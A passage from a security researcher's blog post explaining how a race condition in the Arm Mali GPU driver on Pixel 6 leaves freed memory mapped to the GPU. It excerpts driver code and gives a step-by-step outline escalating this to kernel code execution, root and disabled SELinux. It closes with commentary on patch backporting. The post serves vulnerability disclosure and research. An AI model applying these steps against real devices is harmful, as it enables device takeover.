For example, if the level 2 page table entry is invalid, then mmu_mode->pte_is_valid in the above will return false, and path 1. is taken, which sets count to 512, which is the number of pages contained in a level 2 page table entry. After that, the code jumps to next, which simply advances the address by 512 pages and skips cleaning up the lower-level page table entries for those addresses. If the GPU address where this happens aligns with the size of the entry (512 pages in this case), then there is indeed no need to clean up the level 3 page table entries, as they can only be reached if the level 2 entry is valid.

If, however, the address where pte_is_valid is false does not align with the size of the entry, then the clean up of some page table entries may be skipped incorrectly.

In the above figure, the yellow entry in the level 2 PGD is invalid, while the orange entry right after it is valid. When kbase_mmu_teardown_pages is called with the address 0x7448100000, which has a 256 page offset from the start of the yellow entry, pte_is_valid will return false because the yellow entry is invalid. This then causes the clean up of the addresses between 0x7448100000 and 0x7448300000 (which is 0x7448100000 + 512 pages), to be skipped. For the addresses between 0x7448100000 and 0x7448200000, which is indicated in the green block, this is correct as the addresses are under the yellow entry and cannot be reached. The addresses between 0x7448200000 and 0x7448300000, indicated by the red block, however, are under the orange entry and can still be reached, so skipping their clean up is incorrect as they can still be reached from the orange entry, which is valid.
As it turns out, in all use cases of kbase_mmu_teardown_pages, a valid start address vpfn is passed, which ensures that whenever pte_is_valid is evaluated to false, the corresponding GPUaddress is always aligned and the clean up is correct.
Exploiting the bug
This, however, changes with the bug that we have here.
Recall that, by changing the size of the JIT region while kbase_jit_grow is running, it is possible to create memory regions that have a “gap” in their gpu mapping where some GPU addresses that belong to the region are not mapped. In particular, if I shrink the region completely while kbase_jit_grow is running, I can create a region where the start of the region is unmapped:

When this region is freed, its start address is passed to kbase_mmu_teardown_pages to remove its GPU mappings. If I, then take care so that:

The start of this region is not aligned with the boundary of the level 2 page table entry that contains it;
The previous addresses within this level 2 page table entry are also unmapped;
The “gap” of unmapped addresses in this region is large enough that the rest of the addresses in this level 2 page table entry are also unmapped.

Then, the level 2 page table entry (the yellow entry) containing the start address of the region will become invalid, and when kbase_mmu_teardown_pages is called and pte_is_valid is evaluated at the start of the region, it’ll return false for the yellow entry:

The cleanup in kbase_mmu_teardown_pages then skips the GPU addresses in the orange entry, meaning that the GPU mapping for the addresses in the green block will remain even after the region and its backing pages are freed. This allows the GPU to retain access to memory pages that are already freed.
In the case of a JIT memory region, the only way to free the region is to first place it in the evict_list by submitting the BASE_JD_SOFT_JIT_FREE GPU job, and then create memory pressure, for example, by mapping a large amount of memory via mmap, to cause the linux shrinker to run and free the JIT region that is in the evict_list. After the corrupted JIT region is freed, some of its GPU addresses will retain access to its backing pages, which are now freed and can be reused for other purposes. I can then use the GPU to gain access to these pages when they are reused. So, the two remaining problems now are:

The amount of memory pressure that is required to trigger the Linux shrinker is uncertain, and after allocating a certain amount of memory, there is no guarantee that the shrinker will be triggered. I’d like to find a way to test whether the JIT memory is free after each allocation so that I can reuse its backing pages more reliably.
Reuse the backing pages of the JIT memory in a way that will allow me to gain root.

For the first problem, the situation is very similar to CVE-2022-38181, where the use-after-free bug was triggered through memory eviction, so I can apply the solution from there. The Arm Mali driver provides an ioctl, KBASE_IOCTL_MEM_QUERY that allows users to check whether a memory region containing a GPU address is valid or not. If the JIT region is evicted, then querying its start address with KBASE_IOCTL_MEM_QUERY will return an error. So, by using the KBASE_IOCTL_MEM_QUERY ioctl every time after I mmap some memory, I can check whether the JIT region has been evicted or not, and only try to reclaim its backing pages after it has been evicted.
For the second problem, we need to look at how the backing pages of a memory region are freed. The function kbase_free_phy_pages_helper is responsible for freeing the backing pages of a memory region:
int kbase_free_phy_pages_helper(
    struct kbase_mem_phy_alloc *alloc,
    size_t nr_pages_to_free)
{
    ...
    bool reclaimed = (alloc->evicted != 0);
    ...
    while (nr_pages_to_free) {
        if (is_huge_head(*start_free)) {
          ...
        } else {
            ...
            kbase_mem_pool_free_pages(
                &kctx->mem_pools.small[alloc->group_id],
                local_end_free - start_free,
                start_free,
                syncback,
                reclaimed);
            freed += local_end_free - start_free;
            start_free += local_end_free - start_free;
        }
    }
    ...
}

The function calls kbase_mem_pool_free_pages to free the backing pages, and depending on the reclaimed argument, it either returns the page into memory pools managed by the Arm Mali driver, or directly back to the kernel’s page allocator. In our case, reclaimed is set to true because alloc->evicted is non zero due to the region being evicted. This means the backing pages will go directly back to the kernel’s page allocator
void kbase_mem_pool_free_pages(struct kbase_mem_pool *pool, size_t nr_pages,
        struct tagged_addr *pages, bool dirty, bool reclaimed)
{
    ...
    if (!reclaimed) {          //<------ branch not taken as reclaim is true
        /* Add to this pool */
        ...
    }
    /* Free any remaining pages to kernel */
    for (; i < nr_pages; i++) {
        ...
        p = as_page(pages[i]);
        kbase_mem_pool_free_page(pool, p);   //<---- returns page to kernel
        pages[i] = as_tagged(0);
    }
    ...
}

This means that the freed backing page can now be reused as any kernel page, which gives me plenty of options to exploit this bug. One possibility is to use my previous technique to replace the backing page with page table global directories (PGD) of our GPU kbase_context.
To recap, let’s take a look at how the backing pages of a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used:
int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
        struct tagged_addr *pages, bool partial_allowed)
{
    ...
    /* Get pages from this pool */
    while (nr_from_pool--) {
        p = kbase_mem_pool_remove_locked(pool);     //<------- 1.
        ...
    }
    ...
    if (i != nr_4k_pages && pool->next_pool) {
        /* Allocate via next pool */
        err = kbase_mem_pool_alloc_pages(pool->next_pool,      //<----- 2.
                nr_4k_pages - i, pages + i, partial_allowed);
        ...
    } else {
        /* Get any remaining pages from kernel */
        while (i != nr_4k_pages) {
            p = kbase_mem_alloc_page(pool);     //<------- 3.
            ...
        }
        ...
    }
    ...
}

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First, the pages will be allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).
When freeing a page, provided that the memory region is not evicted, the same happens in reverse order: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context, if the memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator.
As noted in my post “Corrupting memory without memory corruption,” pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context. It is also used for allocating page table global directories (PGD) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found here.)
After triggering the vulnerability, I can retain access to freed backing pages of a JIT region and I’d like to reclaim this page as a PGD of a GPU context. In order to do so, I first need to reuse it as a backing page of another GPU memory region. However, as the freed backing page of the JIT region has now been returned to the kernel, I can only reuse it as a backing page of another region if both the memory pool of the kbase_context and the shared memory pool of the Mali driver (pool->next_pool) are emptied. This can be achieved simply by creating and allocating a sufficient amount of memory regions from the GPU. By doing so, some of the memory regions will take their backing pages from the kernel allocator when the memory pools run out of capacity. So, by creating enough memory regions, the freed backing page of our JIT region may now be reused as a backing page of one of these newly created regions.
To identify which of these new memory regions had reclaimed our backing page, recall that the freed JIT region page is still reachable from the GPU via a GPU address associated with the freed JIT region. I can instruct the GPU to write some recognizable “magic values” to this address, and then search for these “magic values” in the newly created memory regions to identify the one that has reclaimed the backing page.
After identifying the region, I can manipulate the memory pool of its GPU context so that it becomes full, and then when I free this region, its backing page will be returned to pool->next_pool, the shared memory pool managed by the Mali driver. This allows the page to be reused as a PGD of a GPU context. By writing to the GPU address in the freed JIT region, I can then write to this page and modify the PGD. As the bottom level PGD stores the physical addresses of the backing pages to GPU virtual memory addresses, writing to PGD enables me to map arbitrary physical pages to the GPU memory, which I can then access by issuing GPU commands. This gives me access to arbitrary physical memory. As physical addresses for kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite arbitrary kernel code and gain arbitrary kernel code execution.
To summarize, the exploit involves the following steps:

Allocate a JIT memory region, and then free it so that it gets placed on the jit_pool_head list.
Allocate another JIT memory region and request a large backing store, this will reuse the freed region in the jit_pool_head from the previous step. Provided the requested size is large enough, the Mali driver will try to grow the memory pools to fulfill the request.
From a different thread, use the KBASE_IOCTL_MEM_COMMIT ioctl to shrink the backing store of the JIT memory region allocated in step 2. to zero. If this happens while the Mali driver is growing the memory pool, the JIT memory region will become corrupted with the GPU addresses at the start of the region becoming unmapped. As a growing memory pool involves many slow and large allocations, this race can be won easily.
Free the JIT region and to place it on the evict_list.
Increase memory pressure by mapping memory to user space via normal mmap system calls.
Use the KBASE_IOCTL_MEM_QUERY ioctl to check if the JIT memory is freed. Carry on applying memory pressure until the JIT region is freed.
Allocate new GPU memory regions to reclaim the backing pages of the freed JIT memory region.
Identify the GPU memory region that has reclaimed the backing pages.
Free the GPU memory region identified in step 8. and then reuse its backing pages as PGD of a GPU context (using the technique described in my previous blog post).
Rewrite the page table entries so that some GPU addresses point to kernel code. This allows me to rewrite kernel code from the GPU to gain arbitrary kernel code execution, which can then be used to rewrite the credentials of our process to gain root, and to disable SELinux.

The exploit for Pixel 6 can be found here with some setup notes.
Conclusion
In this post I looked at a small change made in version r40p0 of the Arm Mali driver that was somehow missed out when other security patches were applied to the Pixel 6.
Software vendors often separate security related patches from other updates so that their customers can apply a minimal set of security patches while avoiding backward incompatible changes. This creates an interesting situation where the general public, and in particular, attackers and security researchers, only see the entire set of changes, rather than the security-related changes that are going to be backported and used by many users.
For an attacker, whether or not a change is labeled as security-related makes very little difference to what they do. However, for a security researcher who is trying to help, this may stop them from reporting a mislabeled security issue and cause a delay in the patch being applied. In this particular case, although I noticed the change, I never thought to investigate it too closely or to report it as I assumed it would be applied. This resulted in considerable delay between the bug being identified and patched and, in the end, leaving Android users vulnerable to an N-day vulnerability for several months. Making the backporting process more transparent and identifying security patches in public releases could perhaps have prevented such a delay and reduced the amount of time where this bug was exploitable as an N-day.

Notes




Observant readers who learn their European history from a certain comic series may recognise the similarities between this and the beginning of the very first book in the Asterix series, “Asterix the Gaul.” ↩



The post Pwning Pixel 6 with a leftover patch appeared first on The GitHub Blog.